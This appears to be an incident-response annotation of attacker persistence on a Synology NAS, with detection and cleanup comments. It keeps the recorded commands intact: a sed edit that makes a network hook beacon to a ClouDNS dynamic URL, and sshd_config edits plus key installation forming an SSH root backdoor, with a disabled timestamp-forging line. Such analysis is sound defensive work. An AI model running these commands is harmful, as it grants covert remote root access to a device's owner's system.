- /usr/libexec/ hook
e.g.: /usr/libexec/net/if_link_up/synorelayd_hook.sh
# Persistence through a network hook script: every occurrence of the text
# "# reload" in synorelayd_hook.sh is rewritten into a curl request to a
# ClouDNS dynamic-URL endpoint, with stdout and stderr sent to /dev/null.
# NOTE(review): the directory name suggests the hook runs when a network link
# comes up; that trigger is not shown here - confirm on the device.
# NOTE(review): ClouDNS dynamic URLs are a dynamic-DNS update mechanism, so each
# request presumably points a DNS record, owned by whoever issued the q= token,
# at the device's current public address.
# Detection and cleanup:
#   - sed -ibak keeps the pre-edit file beside the script, under the same name
#     with "bak" appended; diff the two.
#   - compare the hook with a known-good copy from the vendor firmware.
#   - look for outbound HTTPS from the NAS to ipv4.cloudns.net.
#   - the q= value identifies the record and can be reported to the provider.
sed -ibak 's/# reload/curl https:\/\/ipv4.cloudns.net\/api\/dynamicURL\/\?q=MjcwODQ3ODoyMDA2OTQyOTk6ZTYxODEyYWZiYWRmOGRmNDgwMTlkMmNmYjA2ZDdlMzYyMmU0ZDc0NWZmNDQ5OTE1ZGNjMmMzMWUzYjQwZWUyMA > \/dev\/null 2>\&1/g' /usr/libexec/net/if_link_up/synorelayd_hook.sh
- SSH Backdoor
/etc/ssh/sshd_config
and /etc.defaults/ssh/sshd_config
# SSH key persistence. Each step below is an indicator to look for during
# triage; the commands themselves are kept exactly as recorded.
#
# Step 1: activate the commented-out AuthorizedKeysFile directive and point it
# at /etc/ssh/authorized_keys. The path is absolute with no per-user token, so
# sshd consults that single file for every account, not only root. Only the
# text "#AuthorizedKeysFile" is replaced; anything that followed it on the line
# is kept, so inspect the resulting line in full.
# Only the /etc.defaults copy is edited here; inspect both sshd_config files.
# sed -ibak leaves the previous file beside it with "bak" appended to the name.
sed -ibak 's/#AuthorizedKeysFile/AuthorizedKeysFile \/etc\/ssh\/authorized_keys/g' /etc.defaults/ssh/sshd_config
# Step 2: turn a commented-out "PubkeyAuthentication no" into an active
# "PubkeyAuthentication yes". This writes the same "bak" file as step 1, so the
# surviving backup holds the config as it was after step 1, not the original.
sed -ibak 's/#PubkeyAuthentication no/PubkeyAuthentication yes/g' /etc.defaults/ssh/sshd_config
# Step 3: install the RSA public key as the system-wide authorized key. ">"
# truncates the target, so any keys that were in the file before are lost. The
# key text is a usable IoC: search every authorized_keys file on the device and
# on other hosts for it.
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCz5oKKpGN+E4e7jTHRf1w3q/hiE3yjZYFx/q9/ZMnny9XAs8DhKpzjbS7044I4oG/zWvj139Nkfc1xCXjC8ylDfF/4jmcF6YtUzzgCMycAxG9xZrHvtrP+vyRdP/OfJnOznviVH5t55gwT0/9ddEMlOOb83oS2LL1e/76qhr44T5h1ym5IHP1iRHPsj5nTnNERr8Dk4qjBexhsc8Ws8igOKc9+ef8xcNrm4ChlEqYdynMh6V9p2HnVENu+FVaJOXFc52TEL17jOp6MSKSEZG9MgAXBFy81Vs1/UkDFUQSXA4KbAz4G6HtTg/5WkkDnZ5r/P9NMCtC9xmFTL9ewDiml' > /etc/ssh/authorized_keys
# Step 4: create root's .ssh directory and install the same key there as well,
# again overwriting whatever the file held.
mkdir /root/.ssh
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCz5oKKpGN+E4e7jTHRf1w3q/hiE3yjZYFx/q9/ZMnny9XAs8DhKpzjbS7044I4oG/zWvj139Nkfc1xCXjC8ylDfF/4jmcF6YtUzzgCMycAxG9xZrHvtrP+vyRdP/OfJnOznviVH5t55gwT0/9ddEMlOOb83oS2LL1e/76qhr44T5h1ym5IHP1iRHPsj5nTnNERr8Dk4qjBexhsc8Ws8igOKc9+ef8xcNrm4ChlEqYdynMh6V9p2HnVENu+FVaJOXFc52TEL17jOp6MSKSEZG9MgAXBFy81Vs1/UkDFUQSXA4KbAz4G6HtTg/5WkkDnZ5r/P9NMCtC9xmFTL9ewDiml' > /root/.ssh/authorized_keys
# Step 5: set both key files to mode 644.
chmod 644 /root/.ssh/authorized_keys
chmod 644 /etc/ssh/authorized_keys
# The next line is disabled. If it were run, it would copy the timestamps of
# /bin/ls onto everything in /etc/ssh, so modification times alone are not
# reliable evidence there; compare file contents or hashes with a known-good
# copy as well.
#touch --reference=/bin/ls /etc/ssh/*
# Step 6: restart the SSH service so sshd re-reads the edited configuration.
# NOTE(review): an unscheduled restart of ssh-shell may show up in the service
# logs - confirm which log records it on the affected release.
# Cleanup: remove the key from both files, restore both sshd_config copies from
# a known-good source, delete the "bak" files once collected as evidence, and
# rotate credentials, since the device was under root control.
synoservicectl --restart ssh-shell
- synocrond
/usr/syno/etc/synocron.d
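Job definition (JSON). When reviewing this directory, check each file's "cmd_list", "user" and schedule against a known-good install: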
[
{
"cmd_list" : [ "/usr/syno/bin/synomyds", "--report_info" ],
"crontab" : "~ 916 * * 15",
"name" : "job",
"period" : "crontab",
"user" : "root"
}
]
/usr/syno/etc/mount.conf
/etc/ddns.conf
/usr/syno/etc/.encrypt